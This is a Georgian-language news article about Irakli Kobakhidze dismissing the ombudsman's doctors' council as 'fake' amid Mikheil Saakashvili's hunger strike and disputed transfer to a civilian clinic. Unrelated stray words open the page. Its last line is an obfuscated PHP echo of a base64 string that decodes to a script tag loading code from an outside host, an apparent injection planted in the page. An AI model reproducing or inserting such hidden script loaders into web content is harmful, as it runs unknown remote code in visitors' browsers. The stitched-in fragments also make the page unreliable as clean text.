celsiusi
ავერსი შნაიდერი
“ქართული ოცნების” თავმჯდომარე, ირაკლი კობახიძე აცხადებს, რომ ომბუდსმენის კონსილიუმის ექიმების მიერ გავრცელებული ინფორმაცია, რომლის თანახმადაც ჯანდაცვის მინისტრი მიხეილ სააკაშვილის სამოქალაქო კლინიკაში გადაყვანას ემხრობა, ტყუილია. ამის შესახებ კობახიძემ ჟურნალისტებთან საუბრისას განაცხადა.
 
მან ასევე “ფეიკი” უწოდა სახალხო დამცველის მიერ შექმნილ კონსილიუმს:
 
“ეკა ტიკარაძეს აქვს თავისი მკაფიო პოზიცია ამაზე. რაც შეეხება ე.წ. კონსილიუმს, რომელმაც განსხვავებული ინფორმაცია გაავრცელა, აქედან ჩანს, რომ ეს ე.წ. კონსილიუმი თვითონ არის ფეიკი და ავრცელებს ფეიკებს ტიკარაძის პოზიციასთან დაკავშირებით. ამაზე მინისტრი თვითონ გააკეთებს განცხადებას”, – განაცხადა კობახიძემ.
 
კონსილუმის წევრმა ერთ-ერთმა ექიმმა, ანესთეზიოლოგ-რეანიმატოლოგმა გიორგი გრიგოლიამ გუშინ, 18 ნოემბერს განაცხადა, რომ ტიკარაძესთან შეხვედრისას დარჩა შთაბეჭდილება, თითქოს მინისტრი ექიმებს დაეთანხმა სააკაშვილის სამოქალაქო კლინიკაში გადაყვანის საკითხზე.
 
“ეკატერინე ტიკარაძის პოზიციაა, როგორც ექიმისა, რომ ის დაეთანხმა ყველა არგუმენტს და ალბათ შეეცდება… დაეთანხმა ყველა არგუმენტს, რომ იმ დაწესებულებაში ასეთი მძიმე ავადმყოფის მკურნალობა არ არის მიზანშეწონილი და უკეთესია გადაიყვანონ მრავალპროფილურ კლინიკაში“, – განაცხადა გრიგოლიამ.
 
მისი თქმით, „ექიმების, მინისტრის და მინისტრის მოადგილის აზრი ემთხვევა ერთმანეთს“.
 
საქართველოს ყოფილი პრეზიდენტი, მიხეილ სააკაშვილი 50-ე დღეა შიმშილობს. გუშინ, 18 ნოემბერს ცნობილი გახდა, რომ ჯანმრთელობის მდგომარეობის გაუარესების გამო ის გლდანის ციხის რეანიმაციულ განყოფილებაში გადაიყვანეს, მან გონება დაკარგა.
 
სააკაშვილი ამბობს, რომ შეწყვეტს შიმშილობას სამოქალაქო საავადმყოფოში გადაყვანის შემთხვევაში.
 
სახალხო დამცველის ინიციატივით შექმნილმა დამოუკიდებელ ექიმთა ჯგუფმა ისევე, როგორც მთავრობის მიერ შექმნილმა და ალტერნატიულმა კონსილიუმებმა, მიხეილ სააკაშვილის მულტიფუნქციურ კლინიკაში გადაყვანის რეკომენდაცია გასცეს, რასაც მთავრობა ამ დრომდე არ ასრულებს.
 
პენიტენციური სამსახური, უსაფრთხოების ზომებიდან და ჯანმრთელობის გაუარესების საფრთხის მოტივით, უარს აცხადებს სააკაშვილის მიყვანაზე სასამართლო პროცესებზე, სადაც ექს-პრეზიდენტის საქმეები განიხილება.
 
900
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");